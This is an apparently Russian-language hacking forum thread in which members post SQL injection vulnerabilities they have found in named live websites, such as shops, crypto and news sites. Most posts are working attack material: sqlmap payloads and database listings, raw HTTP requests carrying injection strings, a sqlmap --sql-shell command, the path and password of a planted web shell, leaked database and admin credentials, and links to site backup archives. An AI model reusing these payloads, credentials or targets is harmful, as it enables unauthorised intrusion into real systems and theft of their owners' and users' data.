Найденные интересеные SQL inj & XSS

boroda4 · 27.04.2021

Поделюсь и я:

Код:

http://brodim.com/
web application technology: OpenResty
back-end DBMS: MySQL 5 (Percona fork)
parameter: id (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=' UNION ALL SELECT CONCAT(CONCAT('qbpbq','eWMjYjKHOsohdtQcgSPLidZuuoDMdNGdaKhdvKVN'),'qzqpq'),NULL,NULL-- rmpl
available databases [2]:                                                                                                                                                                                                                  
[*] brodim
[*] information_schema

solidaros · 28.04.2021

https://hqcombo.com/hqcombo.com.zip форум о базах раздачах.сильно не вникал.бекап

solidaros · 29.04.2021

https://bigeria.com уязвим по унион,кому нужно легко вскроете

Woxo · 30.04.2021

Код:

POST /webbots/btcPaymentStatusAjax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://apps1store.com/
Cookie: PHPSESSID=c904e4d0d7539116679cc30d6b107e0c;__tawkuuid=e::apps1store.com::2934SySEOkRyg5KwgL4sK+vgESdzKyaESIahpIwtpsHgm1CMAKrB22kqIXfmT4/Z::2;TawkConnectionTime=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 101
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Host: apps1store.com
Connection: Keep-alive

address=-1'%20OR%203*2*1=6%20AND%20000553=000553%20--%20&email=sample%40email.tst&software=YouBotTub

solidaros · 30.04.2021

Woxo сказал(а):

Код:

POST /webbots/btcPaymentStatusAjax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://apps1store.com/
Cookie: PHPSESSID=c904e4d0d7539116679cc30d6b107e0c;__tawkuuid=e::apps1store.com::2934SySEOkRyg5KwgL4sK+vgESdzKyaESIahpIwtpsHgm1CMAKrB22kqIXfmT4/Z::2;TawkConnectionTime=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 101
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Host: apps1store.com
Connection: Keep-alive

address=-1'%20OR%203*2*1=6%20AND%20000553=000553%20--%20&email=sample%40email.tst&software=YouBotTub

глянем что там есть)

пароли печаль

Vodovoz · 30.04.2021

Код:

Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
    Payload: https://123chef.es:443/vajilla-desechable/-7557' OR MAKE_SET(1846=1846,6124) AND 'MICJ'='MICJ


    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: https://123chef.es:443/vajilla-desechable/' AND GTID_SUBSET(CONCAT(0x717a716a71,(SELECT (ELT(7065=7065,1))),0x717a7a7071),7065) AND 'YnhS'='YnhS


    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://123chef.es:443/vajilla-desechable/' AND (SELECT 7541 FROM (SELECT(SLEEP(5)))oFQI) AND 'DKtt'='DKtt


available databases [2]:
[*] c123chef_pres844
[*] information_schema

hits · 09.05.2021

Код:

шоп на opencart оплата ба,так же весит джоб сайт,скуля:
sqlmap -u "https://gunaccessories.eu/?route=product/product&path=4_16&product_id=431*" --sql-shell --dbms="MySQL" --drop-set-cookie
шелл:
https://gunaccessories.eu/admin/controller/extension/extension/pasya.php:P@55w()rD

//pma
https://185.72.86.33/pma/
jobsnavigator.eu
define('DB_DRIVER', 'mysqli');
define('DB_HOSTNAME', 'localhost');
define('DB_USERNAME', 'jobsnavi_gunacce');
define('DB_PASSWORD', 'mainPassword');
define('DB_DATABASE', 'jobsnavi_gunacces_maindb');

Vodovoz · 09.05.2021

Possible backup. Не совсем в тему, но может кому пригодится.

Код:

https://paradise8.com/paradise8.zip

AsSdsiwi · 10.05.2021

Скажите пожалуйста, направьте, есть ли ещё такие сайты/топики/блоги
где выкладывают найденные sql/xss уязвимости.
я новичок и мне важно тренироватся

boroda4 · 19.05.2021

Код:

"http://factjo.com/news.aspx/news.aspx?Id=-1;%20waitfor%20delay%20'0:0:6'%20--%20"
Parameter: Id (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)
    Payload: Id=-2778 OR 5321 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5321=5321) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(113)))

    Type: UNION query
    Title: Generic UNION query (random number) - 10 columns
    Payload: Id=-1073 UNION ALL SELECT 5693,5693,5693,5693,5693,5693,5693,5693,CHAR(113)+CHAR(98)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(90)+CHAR(102)+CHAR(118)+CHAR(118)+CHAR(111)+CHAR(77)+CHAR(66)+CHAR(66)+CHAR(85)+CHAR(68)+CHAR(110)+CHAR(85)+CHAR(75)+CHAR(70)+CHAR(72)+CHAR(112)+CHAR(83)+CHAR(109)+CHAR(119)+CHAR(99)+CHAR(107)+CHAR(79)+CHAR(73)+CHAR(101)+CHAR(116)+CHAR(85)+CHAR(117)+CHAR(115)+CHAR(66)+CHAR(90)+CHAR(122)+CHAR(66)+CHAR(101)+CHAR(90)+CHAR(104)+CHAR(112)+CHAR(82)+CHAR(112)+CHAR(100)+CHAR(82)+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(113),5693-- QieU

available databases [9]:
[*] factDB2016
[*] factNewsite
[*] FactoldDB
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb

totulov45 · 29.05.2021

Код:

sqlmap.py -u "https://www.internacionalshopping.com/lojas/grava-destino.asp?destino=1065"

Parameter: destino (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: destino=1065' AND 8705=8705 AND 'TZKQ'='TZKQ

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: destino=1065' AND GTID_SUBSET(CONCAT(0x7162717a71,(SELECT (ELT(2855=2855,1))),0x71706a7671),2855) AND 'cdDB'='cdDB

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
    Payload: destino=1065' OR SLEEP(5) AND 'NagB'='NagB
---
[13:53:20] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[13:53:20] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[13:53:29] [INFO] fetching database names
[13:53:32] [INFO] retrieved: 'information_schema'
[13:53:33] [INFO] retrieved: 'site_internacionalshopping'
available databases [2]:
[*] information_schema
[*] site_internacionalshopping

AsSdsiwi · 10.06.2021

Друзья, поделитесь уязвимостями

solidaros · 10.06.2021

AsSdsiwi сказал(а):

Друзья, поделитесь уязвимостями

POST /api/shrink.php HTTP/1.1
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Referer: 1ink.cc
Cookie: PHPSESSID=1a7i2fncurk3kdp93mdknb16j5
Host: www.1ink.cc
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

showads=0&uid=1&url=e

vally-hood · 10.06.2021

POST /index.php?route=user/user/register HTTP/1.1
Content-Length: 146
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: gecobitexchange.com
Cookie: PHPSESSID=fim62vuqm0rp5t2bpun89qtp60
Host: gecobitexchange.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

ck_termini=on&code_affiliato=94102&email=-1'%20OR%203*2*1%3d6%20AND%20000805%3d000805%20--%20&password=g00dPa%24%24w0rD&rpassword=g00dPa%24%24w0rD

vally-hood · 16.06.2021

My-Crypto-Corner.com (2021)

vally-hood · 16.06.2021

location.best

Cryptocurrency, Herbsters, Free Secure Shell, School Message Boards, Weather, Astronomy Calendar

location.best

---
Parameter: category (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: category=-4045' OR 9329=9329-- iBnQ&link=category-list&topic=18

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: category=228' AND (SELECT 2203 FROM (SELECT(SLEEP(5)))edGW)-- ibyt&link=category-list&topic=18

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: category=228' UNION ALL SELECT NULL,NULL,CONCAT(0x7170786b71,0x6e46784b56674a547057575a785275716e4d444f6961725353777558425575526f47567253794453,0x71766b7871)-- -&link=category-list&topic=18
---
[21:10:38] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:10:38] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[21:10:44] [INFO] fetching database names
available databases [8]:
[*] google
[*] information_schema
[*] location_db
[*] mysql
[*] network
[*] performance_schema
[*] phpmyadmin
[*] sys

vally-hood · 17.06.2021

TRON Faucet - Free TRX Mining Platform

tron-faucet.biz

POST /auth/ HTTP/1.1
Host: tron-faucet.biz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 212
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=c824aaa1d33be2f91eb99d6361ae8f59
Referer: https://tron-faucet.biz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36

user=1&pass=1

Parameter: pass (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user=1&pass=1' AND (SELECT 5756 FROM (SELECT(SLEEP(5)))VATp)-- yPou
---
[19:32:46] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[19:32:46] [INFO] testing MySQL
[19:32:49] [WARNING] reflective value(s) found and filtering out
[19:32:49] [WARNING] frames detected containing attacked parameter values. Please be sure to test those separately in case that attack on this page fails
[19:32:49] [INFO] confirming MySQL
[19:32:49] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.45, Nginx
back-end DBMS: MySQL >= 5.0.0 (Percona fork)
[19:32:49] [INFO] fetching database names
[19:32:49] [INFO] fetching number of databases
[19:32:49] [INFO] resumed: 2
[19:32:49] [INFO] resumed: information_schema
[19:32:49] [INFO] resumed: host1823388_trx
available databases [2]:
[*] host1823388_trx
[*] information_schema

vally-hood · 18.06.2021

Multiple 2500 affected sites sql injection Yemen hacker - CXSecurity.com

s49_hack has realised a new security note Multiple 2500 affected sites sql injection Yemen hacker

cxsecurity.com

не мое,попало мне просто такое.не пинать там линков всем хватит.там я так понял письками мерятся

qwerty1337 · 18.06.2021

vally-hood сказал(а):

Multiple 2500 affected sites sql injection Yemen hacker - CXSecurity.com

s49_hack has realised a new security note Multiple 2500 affected sites sql injection Yemen hacker

cxsecurity.com

не мое,попало мне просто такое.не пинать там линков всем хватит.там я так понял письками

Впорос от зеленого . Вы их массово шоданите ? Или какие-то списки скульмапом сканите?

vally-hood · 19.06.2021

http://leverageminners.com/ admin: Marvel pass:Brokerboy234 сайт скам

POST /action/login.php HTTP/1.1
Host: leverageminners.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Cookie: loggedin=May%2030th%20-%206%3A06%20pm; PHPSESSID=e7abb829e55c8dff4f0ab4879faa2699; _ga=GA1.2.1087658785.1622397623; _gid=GA1.2.2010592923.1622397623; intercom-id-vb1l0h05=174cb86c-eb82-4886-9bea-17961e1ae7f3; intercom-session-vb1l0h05=
Referer: http://leverageminners.com/action/login.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36

balance=0.00&bid=13.09&tradeamount=3&id=143&email=1%27+OR+1%3d1+OR+%27ns%27%3d%27ns

Найденные интересеные SQL inj & XSS

RAM

RAID-массив

RAID-массив

CD-диск

RAID-массив

floppy-диск

RAM

floppy-диск

HDD-drive

RAM

Legend Deep

HDD-drive

RAID-массив

ripper

ripper

ripper

ripper

ripper

(L3) cache

ripper